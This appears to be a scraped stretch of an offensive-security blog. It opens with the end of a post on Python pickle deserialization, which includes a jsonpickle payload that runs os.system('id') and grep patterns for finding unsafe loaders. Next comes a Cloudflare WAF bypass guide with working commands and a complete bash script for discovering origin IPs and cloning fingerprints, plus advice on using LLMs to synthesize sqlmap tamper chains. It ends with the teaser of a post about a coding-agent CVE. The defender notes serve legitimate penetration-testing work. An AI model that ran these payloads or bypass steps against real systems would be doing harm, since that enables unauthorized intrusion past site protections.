  "py/object": "__main__.RCE",
  "py/reduce": [
    {"py/type": "os.system"},
    {"py/tuple": ["id"]}
  ]
}

Finding the Bug in Code Review

Semgrep and CodeQL both ship rules for this class. The high-value greps to do by hand when you land in a Python codebase:

rg -n 'pickle\.loads?\(|cPickle\.loads?\(|_pickle\.loads?\(' 
rg -n 'dill\.loads?\(|jsonpickle\.decode\(|shelve\.open\('
rg -n 'yaml\.load\(|yaml\.unsafe_load\(|Loader=yaml\.Loader'
rg -n 'torch\.load\(' | rg -v 'weights_only=True'
rg -n 'joblib\.load\(|numpy\.load\(.*allow_pickle=True'
rg -n 'PickleSerializer' # Django sessions, old code

For each hit, trace the source of the argument backwards until you hit a trust boundary. Any HTTP input, any cache, any queue, any file under user control.

Practitioner note: torch.load(path, weights_only=True) is the single most impactful change for ML codebases. It restricts the unpickler to a safe allow-list of tensor-related globals. It is not default across all PyTorch versions yet. Check every call site.

The Only Real Defense

Stop using pickle for untrusted data. Full stop. The pickle documentation has said this since Python 2. No scanner, no wrapper, no "restricted unpickler" has held up against determined gadget-chain research. There is no safe subset of pickle that preserves its usefulness.

  • Data interchange: JSON, MessagePack, Protocol Buffers, CBOR. Data only, no code.
  • Config: yaml.safe_load, always, no exceptions.
  • ML weights: safetensors. It is the format for a reason. If your model only ships in pickle, get it re-exported or run it in a jailed process.
  • Sessions, cache, queues: HMAC-signed JSON. Rotate keys. Never pickle.
  • If you must load ML pickles: a sandboxed subprocess with no network, no write access, dropped capabilities. Assume code execution and contain it. That is the threat model.

Closing

The pickle problem has been "known" since before I started writing this blog. It is still shipping in production. It is still in the default load path of half the ML libraries you import. The reason it is not fixed is because fixing it breaks the developer ergonomics that made pickle popular in the first place.

That is the honest summary. The language gave you a primitive that executes code on load, the ecosystem built on top of it, and "don't unpickle untrusted data" has been interpreted as "my data is trusted" by a generation of developers. Every pentest engagement that includes a Python backend should probe for this. Every ML pipeline review should assume model weights are attacker-controlled until proven otherwise.


elusive thoughts • securityhorror.blogspot.com

AI-Assisted WAF Fingerprinting and Why the Orange Shield Is a Filter, Not a Perimeter

Bypassing Cloudflare: AI-Assisted WAF Fingerprinting and Why the Orange Shield Is a Filter, Not a Perimeter

Offensive recon • WAF evasion • April 2026

wafcloudflarereconllm-assistedred-team

A WAF is not a perimeter. Every time an engagement starts with a target proudly sitting behind Cloudflare and the suits asking if that "covers us," I have to bite my tongue. Cloudflare is a filter. It inspects traffic that routes through it. If you can talk to the origin directly, or if you can make your traffic look indistinguishable from a real Chrome 124 on Windows 11, the filter never fires.

This post is about the two halves of that bypass in 2026: origin discovery (so you can skip the WAF entirely) and fingerprint cloning (so that when you cannot skip it, you blend in). And because everyone wants to know where the LLMs plug in, I will tell you exactly where they actually earn their keep — and where they are a distraction.

How Cloudflare Actually Identifies You

Cloudflare's detection stack has layers. Understanding them is the whole engagement:

  • IP reputation and ASN. Datacenter ranges, known VPN exits, and Tor exits start the request with a negative score.
  • TLS fingerprinting. JA3, JA4, and JA4+ hash your Client Hello: cipher suite order, supported groups, extension order, ALPN, signature algorithms. Python requests has a fingerprint. curl has a fingerprint. Chrome 124 on Windows has a fingerprint. Cloudflare knows all of them.
  • HTTP/2 fingerprinting. Frame order, SETTINGS values, HEADERS pseudo-header ordering. Akamai has been using this since 2020; Cloudflare followed.
  • Header entropy and consistency. If your User-Agent claims Chrome but you sent Accept-Language before Accept-Encoding in a non-Chrome order, that is a tell. If you sent Sec-CH-UA-Full-Version-List with a Firefox UA, Firefox does not ship that header.
  • Canvas, WebGL, and JS challenges. The managed challenge and the JS challenge execute code in the browser and return a signed token. Headless leaks (navigator.webdriver, missing plugin arrays, headless Chrome string in UA) get caught here.
  • Behavioral. Mouse entropy, scroll patterns, time-to-interaction. This is the slowest layer but the hardest to fake.

Origin IP Discovery: The Actual Win

Most real engagements end here. You do not bypass Cloudflare, you route around it. The October 2025 /.well-known/acme-challenge/ zero-day was fun, but the long-term winners are the same techniques that have worked since 2018 and still do in 2026:

Passive DNS and certificate transparency

# Historical DNS records
curl -s "https://api.securitytrails.com/v1/history/${DOMAIN}/dns/a" \
  -H "APIKEY: $ST_API"

# Certificate transparency logs — catch the cert before CF fronted it
curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" \
  | jq -r '.[].common_name' | sort -u

# Censys: find hosts serving the target cert SHA256
censys search "services.tls.certificates.leaf_data.fingerprint: ${CERT_SHA256}"

Half the time the origin is in a cloud subnet that still serves the cert directly. Validate with a Host header override:

curl -vk --resolve ${TARGET}:443:${CANDIDATE_IP} \
  "https://${TARGET}/" -H "User-Agent: Mozilla/5.0"

If the response matches what you see through Cloudflare and there is no cf-ray header, you are at the origin.

The usual suspects for IP leakage

  • Mail servers. dig mx, then check SPF TXT records. Companies front their web through CF but send mail from the origin network.
  • Subdomain sprawl. dev., staging., old., direct., origin. — often not proxied. amass, subfinder, and crtfinder remain the workhorses.
  • Favicon hash pivot. Get the favicon SHA from the CF-fronted site, search Shodan with http.favicon.hash:${MURMUR3}.
  • Misconfigured DNS providers. Free-tier DNS accidentally exposing A records the customer thought were internal.
  • Webhooks, error reports, XML-RPC. Anywhere the app itself reaches out to the internet and leaks an IP header.

Where AI Actually Helps

Most LLM-assisted WAF bypass content online is nonsense. Throwing "generate an XSS that evades Cloudflare" at a frontier model yields the same stale payloads that got baked into the managed ruleset in 2023. The model has no feedback loop with the target, so it is guessing against the ruleset it saw in training data.

Where an LLM genuinely helps:

1. Header set generation for fingerprint cloning

Given a captured browser request, an LLM can produce a set of header permutations that preserve the UA's semantic coherence (no conflicting client hints, correct header ordering for that browser family) faster than you can script the rules. I use it to generate the consistency constraints, then feed those into curl-impersonate or a custom HTTP/2 client. The model does not send traffic; it produces the permutation space.

2. WAF rule reverse engineering from responses

Send 500 mutated payloads, capture the responses (block page, 403, 429, pass), feed the (payload, response) pairs to the model, ask it to hypothesize what substrings are being matched. It is significantly better than regex-mining by hand. Treat its hypotheses as leads, not conclusions.

3. Sqlmap tamper script synthesis

Give the model a target parameter, a block message, and a working-in-isolation payload, ask for a tamper chain. This is what nowafpls and friends do deterministically; the model just makes the chain wider.

What the model does not do is bypass the JS challenge. It cannot run v8 in its head. Every serious bypass in 2026 still goes through curl-impersonate, Camoufox, SeleniumBase with undetected-chromedriver, or a fortified Playwright build. The LLM is a combinatorics engine around those tools.

Warning from the field: Cloudflare deployed generative honeypots in 2025 that return 200 OK with hallucinated content to poison scrapers and attackers alike. If your test harness believes "200 = pass," you are getting fed. Validate with entropy checks against known-good content.

Putting It Together: A Clean Bypass Flow

#!/bin/bash
# Stage 1: origin discovery
subfinder -d $TARGET -silent | httpx -silent -tech-detect \
  | grep -v "Cloudflare" > non_cf_subs.txt

# Stage 2: cert pivot
cert_sha=$(echo | openssl s_client -connect $TARGET:443 2>/dev/null \
  | openssl x509 -fingerprint -sha256 -noout | cut -d= -f2 | tr -d :)
censys search "services.tls.certificates.leaf_data.fingerprint:${cert_sha}" \
  > origin_candidates.txt

# Stage 3: validate
while read ip; do
  code=$(curl -sk --resolve $TARGET:443:$ip \
    -o /dev/null -w "%{http_code}" "https://$TARGET/" \
    -H "User-Agent: Mozilla/5.0")
  [ "$code" = "200" ] && echo "ORIGIN: $ip"
done < origin_candidates.txt

# Stage 4: if no origin, fall through to fingerprint cloning
curl-impersonate-chrome -s "https://$TARGET/" --compressed

Defender Notes

If you are on the blue side, the mitigations are not new but they are still not deployed at most of the orgs I see:

  • Authenticated Origin Pulls (mTLS). The origin only accepts connections presenting a Cloudflare-signed client cert. Every "I found the origin IP" report dies here.
  • Cloudflare Tunnel. No public origin IP at all.
  • Firewall the origin to Cloudflare IP ranges only. The absolute minimum. Rotate the origin IP after onboarding so historical DNS records do not leak it.
  • Disable non-standard ports on the origin. Cloudflare WAF rule 8e361ee4328f4a3caf6caf3e664ed6fe blocks non-80/443 at the edge; the origin should not even listen.
  • Header secret. Require a custom header containing a pre-shared secret set as a Cloudflare Transform Rule. Stops the attacker-owned-Cloudflare-account bypass.

Closing

The WAF industry wants you to believe that a slider in a dashboard is security. It is not. It is a filter in front of the thing that is actually exposed. If you do not harden the origin with mTLS and IP allow-lists, you have an orange proxy and a footgun in the same shape.

And if you are reading this as a defender: the next time a penetration test report comes back clean because "everything is behind Cloudflare," send it back. Ask for a retest that assumes origin disclosure. That is the test you actually wanted.


elusive thoughts • securityhorror.blogspot.com

CVE-2025-59536: When Your Coding Agent Becomes the Backdoor

// ELUSIVE THOUGHTS — APPSEC / AI AGENTS CVE-2025-59536: When Your Coding Agent Becomes the Backdoor Posted by Jerry — May 2026 On F...